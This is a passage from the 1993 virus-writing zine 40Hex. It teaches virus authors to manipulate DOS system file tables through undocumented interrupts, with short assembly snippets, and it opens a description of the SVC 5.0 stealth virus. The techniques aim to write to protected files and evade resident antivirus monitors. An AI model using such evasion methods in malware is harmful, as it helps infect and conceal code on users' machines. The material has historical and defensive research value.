ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
A powerful though seldom-used technique in virus writing is the use of
the system file table, an internal DOS structure similar in some respects to
FCBs, albeit vastly more powerful. The system file table holds the critical
information on the state of an open file, including the current pointer
location, the open mode, and the file size. Manipulation of the system file
tables can often replace calls to corresponding DOS interrupt routines and
therefore, when combined with other techniques, reduces the effectiveness of
a TSR virus monitor and decreases code size.
Each open file has a corresponding system file table. The following
tables come from Ralf Brown's interrupt listing.
Format of DOS 2.x system file tables:
Offset Size Description
00h DWORD pointer to next file table
04h WORD number of files in this table
06h 28h bytes per file
Offset Size Description
00h BYTE number of file handles referring to this file
01h BYTE file open mode (see AH=3Dh)
02h BYTE file attribute
03h BYTE drive (0 = character device, 1 = A, 2 = B, etc)
04h 11 BYTEs filename in FCB format (no path, no period,
blank-padded)
0Fh WORD ???
11h WORD ???
13h DWORD file size???
17h WORD file date in packed format (see AX=5700h)
19h WORD file time in packed format (see AX=5700h)
1Bh BYTE device attribute (see AX=4400h)
---character device---
1Ch DWORD pointer to device driver
---block device---
1Ch WORD starting cluster of file
1Eh WORD relative cluster in file of last cluster accessed
------
20h WORD absolute cluster number of current cluster
22h WORD ???
24h DWORD current file position???
Format of DOS 3.x system file tables and FCB tables:
Offset Size Description
00h DWORD pointer to next file table
04h WORD number of files in this table
06h 35h bytes per file
Offset Size Description
00h WORD number of file handles referring to this file
02h WORD file open mode (see AH=3Dh)
bit 15 set if this file opened via FCB
04h BYTE file attribute
05h WORD device info word (see AX=4400h)
07h DWORD pointer to device driver header if character device
else pointer to DOS Drive Parameter Block (see AH=32h)
0Bh WORD starting cluster of file
0Dh WORD file time in packed format (see AX=5700h)
0Fh WORD file date in packed format (see AX=5700h)
11h DWORD file size
15h DWORD current offset in file
19h WORD relative cluster within file of last cluster accessed
1Bh WORD absolute cluster number of last cluster accessed
0000h if file never read or written???
1Dh WORD number of sector containing directory entry
1Fh BYTE number of dir entry within sector (byte offset/32)
20h 11 BYTEs filename in FCB format (no path/period, blank-padded)
2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file
2Fh WORD (SHARE.EXE) network machine number which opened file
31h WORD PSP segment of file's owner (see AH=26h)
33h WORD offset within SHARE.EXE code segment of
sharing record (see below) 0000h = none
Format of DOS 4+ system file tables and FCB tables:
Offset Size Description
00h DWORD pointer to next file table
04h WORD number of files in this table
06h 3Bh bytes per file
Offset Size Description
00h WORD number of file handles referring to this file
02h WORD file open mode (see AH=3Dh)
bit 15 set if this file opened via FCB
04h BYTE file attribute
05h WORD device info word (see AX=4400h)
bit 15 set if remote file
bit 14 set means do not set file date/time on closing
07h DWORD pointer to device driver header if character device
else pointer to DOS Drive Parameter Block (see AH=32h)
or REDIR data
0Bh WORD starting cluster of file
0Dh WORD file time in packed format (see AX=5700h)
0Fh WORD file date in packed format (see AX=5700h)
11h DWORD file size
15h DWORD current offset in file
---local file---
19h WORD relative cluster within file of last cluster accessed
1Bh DWORD number of sector containing directory entry
1Fh BYTE number of dir entry within sector (byte offset/32)
---network redirector---
19h DWORD pointer to REDIRIFS record
1Dh 3 BYTEs ???
------
20h 11 BYTEs filename in FCB format (no path/period, blank-padded)
2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file
2Fh WORD (SHARE.EXE) network machine number which opened file
31h WORD PSP segment of file's owner (see AH=26h)
33h WORD offset within SHARE.EXE code segment of
sharing record (see below) 0000h = none
35h WORD (local) absolute cluster number of last clustr
accessed (redirector) ???
37h DWORD pointer to IFS driver for file, 0000000h if native DOS
In order to exploit this nifty structure in DOS, the virus must first
find the location of the appropriate system file table. This may be easily
accomplished with a few undocumented DOS calls. Given the file handle in
bx, the following code will return the address of the corresponding system
file table:
mov ax,1220h ; Get job file table entry to ES:DI
int 2fh ; DOS 3+ only
mov bl,es:di ; get number of the SFT for the file handle
; -1 = handle not open
mov ax,1216h ; get address of the system file table
int 2fh ; entry number bx
; ES:DI now points to the system file table entry
Now that the system file table entry address is known, it is a trivial
matter to alter the various bytes of the entry to fit your particular needs.
Most viruses must first clear a file's attributes in order to open the file
in read/write mode, since it would otherwise not be able to write to a read-
only file. This handicap is easily overcome by opening the file in read-
only mode (al = 0) and changing the byte (or word) referring to the file's
open mode to 2. This has the added benefit of bypassing some resident
alarms, which generally do not go off if a file is opened in read only mode.
It is also possible to set a file's pointer by altering the double word at
offset 15h (in DOS 3+). So a quick and easy way to reset the file pointer
is:
mov es:di+15h,0
mov es:di+17h,0
It is acceptable to ignore the DOS 2.X system file table format. DOS
2.X is not in common use today and many programs simply refuse to run under
such primitive versions. Most of the useful offsets are constant in DOS
3.X+, which simplifies the code tremendously.
This is only a surface treatment of a topic which warrants further
investigation. Numerous opportunities exist for the enterprising virus
author to exploit the power of the system file tables. But the only way to
find these opportunities is to experiment. Have fun!
40Hex Issue 11 Volume 3 Number 2 File 007
SVC 5.0
SVC 5.0 is a good example of a true stealth virus. Cheesy, primitive
stealth-wanna-be viruses "disinfect" by rewriting the files on the disk.
Not so with SVC 5.0 and all real stealth viruses, which alter only the memory
image of the file, leaving the original intact. This has advantages,
including:
o Time savings
o Fewer disk accesses
o No additional disk writes are required
General Notes:
SVC 5.0 is a parasitic, resident COM and EXE infector. It does not
have encryption, but this is offset by the true stealth capabilities of the
virus. Although it hides the file length increase, the virus does not suffer
from the dreaded CHKDSK crosslinking errors experienced by many early stealth
viruses. However, the code to overcome this problem is kludgily implemented;
the virus detects execution of programs with the "HK" and "DS" strings in the
filename. Although this helps with CHKDSK, it won't help with other programs
which work in CHKDSK's asinine fashion.
-- Dark Angel
Phalcon/Skism 1993